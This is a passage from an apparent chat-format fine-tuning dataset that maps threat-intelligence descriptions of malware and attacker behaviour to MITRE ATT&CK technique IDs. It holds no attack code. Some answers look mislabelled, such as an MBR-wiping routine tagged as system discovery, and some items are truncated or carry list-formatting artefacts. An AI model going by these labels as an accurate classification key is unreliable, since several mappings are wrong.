- },
- {
- "role": "assistant",
- "content": "T1025 - Data from Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "One variant of uses HTTP and HTTPS for C2."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used RDP to move laterally to systems in the victim environment."
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dtrack’s dropper can list all running processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Check the email sender, subject, and body for anything suspicious before downloading and opening email attachments. Check the file extension of the attached file and make sure it is the intended file format. Avoid activating macro for any attached Microsoft Office files, especially for emails that request macro activation using an image of the body of the opened file or those that don’t show anything. Subtle changes to a popular URL can be one indicator of malicious content"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation CuckooBees, the threat actors used the `query user` and `whoami` commands as part of their advanced reconnaissance."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The \"Office Test\" persistence mechanism allows threat actors to execute a Trojan each time a user runs any of the Office applications. This persistence mechanism loads a malicious DLL by leveraging a registry key that appears to be used during the development and testing of Microsoft Office applications. The use of this registry key for persistence is quite clever, as it requires user interaction to load and execute the malicious payload, which makes automated analysis in sandboxes challenging. Low awareness of this persistence method, coupled with the sandbox evasion obtained from user interactions, makes this a potentially attractive persistence method that we believe may be used in future attacks. Unit 42 suggests monitoring for systems that have this registry key already created, as it is possible a threat is already using the key for persistence purposes. Microsoft has added the “Office Test” registry keys to its Autoruns tool for detection purposes as well. Also, we suggest disabling this persistence method by creating the “Office test” registry key in read-only mode as outlined in this blog"
- },
- {
- "role": "assistant",
- "content": "T1137.002 - Office Application Startup: Office Test"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Windshift has sent spearphishing emails with links to harvest credentials and deliver malware."
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Emotet has been observed to hook network APIs to monitor network traffic."
- },
- {
- "role": "assistant",
- "content": "T1040 - Network Sniffing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attack typically begins with an attempt – most probably via a spearphishing email – to lure the intended victim into running the malicious dropper, which is attached to the email. In order to increase the likelihood that the unsuspecting victim will actually click on it, the malicious executable masquerades as a document or spreadsheet by displaying a fake icon"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment', 'T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can gather victim drive information."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The SOMBRAT backdoor is packaged as a 64-bit Windows executable. It communicates with a configurable command and control (C2) server via multiple protocols, including DNS, TLS-encrypted TCP, and potentially WebSockets. The backdoor's primary purpose is to download and execute plugins provided via the C2 server. In contrast to the SOMBRAT version published in November 2020, Mandiant observed additional obfuscation and armoring to evade detection, this SOMBRAT variant has been hardened to discourage analysis. Program metadata typically included by the compiler has been stripped and strings have been inlined and encoded via XOR-based routines"
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BAT files were used to download and execute the Cring ransomware on the other systems in the compromised network. It also uses the Windows CertUtil program to help with the said download."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MacSpy can steal clipboard contents."
- },
- {
- "role": "assistant",
- "content": "T1115 - Clipboard Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BLUELIGHT can harvest cookies from Internet Explorer, Edge, Chrome, and Naver Whale browsers."
- },
- {
- "role": "assistant",
- "content": "T1539 - Steal Web Session Cookie"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike can mimic the HTTP protocol for C2 communication, while hiding the actual data in either an HTTP header, URI parameter, the transaction body, or appending it to the URI."
- },
- {
- "role": "assistant",
- "content": "T1001.003 - Protocol or Service Impersonation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uploads files and secondary payloads to the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tropic Trooper used \"netview\" to scan target systems for shared resources."
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT19 used HTTP for C2 communications. APT19 also used an HTTP malware variant to communicate over HTTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a command to delete files."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Earth Lusca has used compromised web servers as part of their operational infrastructure."
- },
- {
- "role": "assistant",
- "content": "T1584.004 - Server"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OceanSalt can collect the name and ID for every process running on the system."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The purpose of this malware is to allow the actors to download and execute an executable file, as well as download and run batch files to run commands on the end system"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "1) It uses the application programming interface (API) CreateFileA to \\\\.\\PHYSICALDRIVE0 to retrieve the handle of the hard disk. 2) It overwrites the first sector of the disk (512 bytes) with \"0x00\". The first sector is the disk’s MBR. 3) It will try to perform the routines above (steps 1-2) on \\\\.\\PHYSICALDRIVE1, \\\\.\\PHYSICALDRIVE2, \\\\.\\PHYSICALDRIVE3, and so on, as long as a hard disk is available"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly has used various types of scripting to perform operations, including batch scripts."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AppleJeus has required user execution of a malicious MSI installer."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware calls User32.dll's GetKeyboardLayoutList function, inspects the keyboard identifier, and returns true if the result ends in a value between \\x18 thru \\x44 inclusive. This result means the compromised host is whitelisted based on the host's configured keyboard layout. The malware inspects only the lower byte of the full keyboard identifier, so all systems using the keyboard locales listed in Table 4 are immune to REvil. Despite the large number of potential matches, CTU researchers suspect that the malware author intended to identify Russian keyboards based on several other links to the Russia-based GandCrab ransomware"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "obfuscates strings using a custom stream cipher."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SUGARDUMP can search for and collect data from specific Chrome, Opera, Microsoft Edge, and Firefox files, including any folders that have the string `Profile` in its name."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The TerraLoader code performs several integrity checks before dropping the payload. These checks implement anti-debugging techniques and try to identify anomalies to prevent execution in sandboxed environments. Some of these techniques range from detecting incorrect parameters, filenames and extensions, to detecting hardware breakpoints or identifying specific modules loaded into the subject process. Should these checks all pass, the actual payload is decrypted and executed"
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Audit all remote authentications from trusted networks or service providers. Detect mismatches by correlating credentials used within internal networks with those employed on external-facing systems. Log use of system administrator commands such as net, ipconfig, and ping"
- },
- {
- "role": "assistant",
- "content": "T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A .dll file is digitally signed by a certificate from AirVPN."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once executed, NavRAT will immediately leverage cmd.exe to perform a systeminfo and a tasklist check on the system it is running on while writing the output to a TMP file, once again attempting to hide within an AhnLab folder. Interestingly, the attacker has used the >> method to append to the file so there can be multiple outputs written to their single TMP file"
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LightNeuron contains a function to encrypt and store emails that it collects."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Azorult can capture screenshots of the victim’s machines."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "There are two forms of encrypted strings: an RSA256-encrypted string, and custom base64-encoded and RSA256-encrypted string"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT18 actors deleted tools and batch files from victim systems."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lucifer can identify the IP and port numbers for all remote connections from the compromised host."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ke3chang has used credential dumpers or stealers to obtain legitimate credentials, which they used to gain access to victim accounts."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malicious .lnk files contain a link to a URL (instead of the expected local URI) to grab the next payload"
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ServHelper may download additional files to execute."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CHOPSTICK encrypts C2 communications with TLS."
- },
- {
- "role": "assistant",
- "content": "T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ngrok can tunnel RDP and other services securely over internet connections."
- },
- {
- "role": "assistant",
- "content": "T1572 - Protocol Tunneling"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Strings in the malware are obfuscated using the RC4 algorithm and the decryption key stored inside the sample"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GoldMax will check if it is being run in a virtualized environment by comparing the collected MAC address to \"c8:27:cc:c2:37:5a\"."
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "StoneDrill can check for antivirus and antimalware programs."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Windshift has created LNK files in the Startup folder to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses GET and POST requests over HTTP or HTTPS for command and control to obtain commands and send ZLIB compressed data back to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Earth Lusca has used a \"DCSync\" command with Mimikatz to retrieve credentials from an exploited controller."
- },
- {
- "role": "assistant",
- "content": "T1003.006 - OS Credential Dumping: DCSync"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cannon uses SMTP/S and POP3/S for C2 communications by sending and receiving emails."
- },
- {
- "role": "assistant",
- "content": "T1071.003 - Mail Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "REvil can use Native API for execution and to retrieve active services."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stuxnet can propagate via removable media using an autorun.inf file or the CVE-2010-2568 LNK vulnerability."
- },
- {
- "role": "assistant",
- "content": "T1091 - Replication Through Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NanoCore can open a remote command-line interface and execute commands. NanoCore uses JavaScript files."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KONNI has executed malicious JavaScript code."
- },
- {
- "role": "assistant",
- "content": "T1059.007 - Command and Scripting Interpreter: JavaScript"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A uses a encrypted and compressed payload that is disguised as a bitmap within the resource section of the installer."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The frequent checking ensures that any changes made will be quickly followed, and the repeated attempts to run the Revenge RAT binary make it almost certain that even if the process is terminated, the RAT will be running again soon"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery', 'T1043 - Commonly Used Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates a backdoor through which remote attackers can retrieve a list of running processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "performs the tasklist command to list running processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Daserf hides collected data in password-protected .rar archives."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data', 'T1560.001 - Archive Collected Data: Archive via Utility"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BUBBLEWRAP is a full-featured backdoor that is set to run when the system boots, and can communicate using HTTP, HTTPS, or a SOCKS proxy. This backdoor collects system information, including the operating system version and hostname, and includes functionality to check, upload, and register plugins that can further enhance its capabilities"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has created new services for persistence."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ShadowPad has used DNS tunneling for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.004 - Application Layer Protocol: DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SLOTHFULMEDIA has created a service on victim machines named \"TaskFrame\" to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Similar to many other ransomware operators, CARBON SPIDER not only encrypted victim files using Darkside, but also exfiltrated data for publication on a dedicated leak site (DLS) hosted on Tor. For exfiltration, CARBON SPIDER primarily leveraged the MEGASync client for hosting provider MEGA but also employed GoToAssist"
- },
- {
- "role": "assistant",
- "content": "T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The s.exe (SHA256: 04f48ed27a83a57a971e73072ac5c769709306f2714022770fb364fd575fd462) uploaded to the error2.aspx webshell is a self-extracting 7-zip archive that is an example of the HyperBro backdoor. According to Kaspersky and SecureWorks research, HyperBro is a custom backdoor developed and used by Emissary Panda in their attack campaigns. This sample of HyperBro is similar to the sample discussed in Kaspersky’s research, specifically using a legitimate pcAnywhere application to sideload a DLL to decrypt, decompress and run a payload embedded within a file named ‘thumb.db’. Table 5 shows the three files associated with this HyperBro sample, which have the same file names as the self-extracting 7zip archives mentioned in Kaspersky’s blog (SHA256 hashes: 34a542356ac8a3f6e367c6827b728e18e905c71574b3813f163e043f70aa3bfa and 2144aa68c7b2a6e3511e482d6759895210cf60c67f14b9485a0236af925d8233"
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HDoor scans to identify open ports on the victim."
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malicious obfuscated VBA code is executed when the macro is first enabled"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "establishes persistence by creating the Registry key HKCU\\Software\\Microsoft\\Windows\\Run."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NETWIRE has used .NET packer tools to evade detection."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The TAINTEDSCRIBE main executable has disguised itself as Microsoft’s Narrator."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a built-in utility command for netstat, can do net session through PowerView, and has an interactive shell which can be used to discover additional information."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Nerex creates a Registry subkey that registers a new service."
- },
- {
- "role": "assistant",
